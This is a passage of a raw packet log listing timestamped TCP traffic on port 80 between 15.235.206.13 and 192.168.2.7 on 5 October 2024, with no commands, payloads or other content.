                                            Oct 5, 2024 14:36:16.642043114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642143965 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642155886 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642168999 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642174006 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.642182112 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642194033 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642205954 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642227888 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.642271996 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.642277956 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.642333031 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.647012949 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.647095919 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.647106886 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.647116899 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.647170067 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.647275925 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.873101950 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873120070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873137951 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873224974 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.873306990 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873320103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873331070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873389959 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.873425961 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.873687983 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873750925 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873763084 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873794079 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.873802900 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.873850107 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.874330044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874383926 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874394894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874414921 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874434948 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.874466896 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.874867916 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874922991 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874934912 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.874974012 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.875005007 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875019073 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875053883 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.875775099 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875819921 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875828981 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.875829935 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875881910 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.875916958 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875927925 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.875986099 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:16.878128052 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.878175020 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.878185987 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:16.878236055 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104146004 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104161978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104182005 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104195118 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104208946 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104242086 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104317904 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104325056 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104335070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104372978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104378939 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104438066 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104487896 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104499102 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104526997 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104541063 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104625940 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104639053 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104679108 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104692936 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104703903 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104717016 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.104741096 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.104763985 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105021000 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105031013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105043888 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105079889 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105108023 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105119944 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105159044 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105259895 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105310917 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105319023 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105329990 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105370045 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105448961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105459929 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105472088 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105484962 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105505943 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105550051 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105597973 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105613947 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105633974 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105645895 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105657101 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105664015 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.105670929 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.105724096 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106270075 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106307983 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106326103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106338978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106390953 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106468916 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106481075 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106492043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106503963 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106524944 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106554985 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106647968 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106659889 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106672049 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106688976 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106698990 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106705904 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106710911 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.106724024 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.106770039 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.107182980 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.107253075 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.107265949 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.107280016 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.107294083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.107328892 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.109098911 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.109180927 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335342884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335375071 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335400105 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335469007 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335485935 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335488081 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335555077 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335568905 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335583925 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335585117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335642099 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335692883 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335707903 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335735083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335777998 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335812092 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335828066 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335845947 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335861921 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335891008 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.335921049 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335936069 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335953951 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.335987091 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336208105 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336224079 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336240053 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336253881 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336266994 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336270094 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336286068 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336297035 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336302042 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336334944 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336363077 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336410999 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336437941 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336452961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336469889 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336508989 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336538076 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336544991 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336560965 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336577892 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336595058 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336620092 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336662054 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336672068 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336714029 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336730003 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336745977 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336762905 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336791039 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336882114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336898088 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336914062 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336945057 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.336954117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336970091 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.336983919 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337001085 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337008953 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.337018013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337035894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337044954 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.337074041 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.337348938 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337363958 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337380886 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337395906 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337400913 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.337412119 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337428093 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337436914 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.337445021 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337460995 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.337461948 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.337493896 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340590000 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340620041 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340648890 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340667963 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340676069 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340692043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340704918 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340743065 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340745926 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340761900 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340778112 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340825081 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340878010 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340893984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340909004 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340933084 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340969086 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.340977907 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.340992928 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341007948 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341033936 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341079950 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341094971 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341110945 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341129065 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341130018 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341164112 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341178894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341233969 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341281891 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341298103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341315031 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341329098 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341346979 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341347933 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341376066 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341384888 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341391087 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341423035 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341490030 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341504097 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341523886 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341537952 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341541052 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341581106 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341634035 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341650009 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341665030 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341684103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341686010 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341701031 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.341716051 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.341748953 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.361885071 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.422199965 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422230005 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422238111 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422369957 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.422373056 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422388077 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422404051 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422420025 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422435999 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.422437906 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422461033 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.422480106 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422496080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422496080 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.422511101 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422527075 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.422558069 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.422596931 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.576353073 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576390982 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576409101 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576426029 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576445103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576462030 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576483011 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576525927 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.576566935 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.576586008 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576612949 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576627016 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.576628923 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576646090 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576662064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576670885 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.576678991 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576688051 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.576729059 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.576735020 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577004910 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577020884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577038050 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577054024 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577064037 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577069044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577084064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577092886 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577099085 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577116013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577121973 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577132940 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577148914 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577157021 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577166080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577182055 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577193975 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577198029 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577214956 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577220917 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577243090 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577275991 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577465057 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577481985 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577507973 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577536106 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577553034 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577568054 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577575922 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577589989 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577594995 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577614069 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577646017 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577935934 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577951908 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577967882 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.577995062 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.577996969 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.578015089 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.578032017 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:17.578037977 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:17.578047991 CEST804969915.235.206.13192.168.2.7
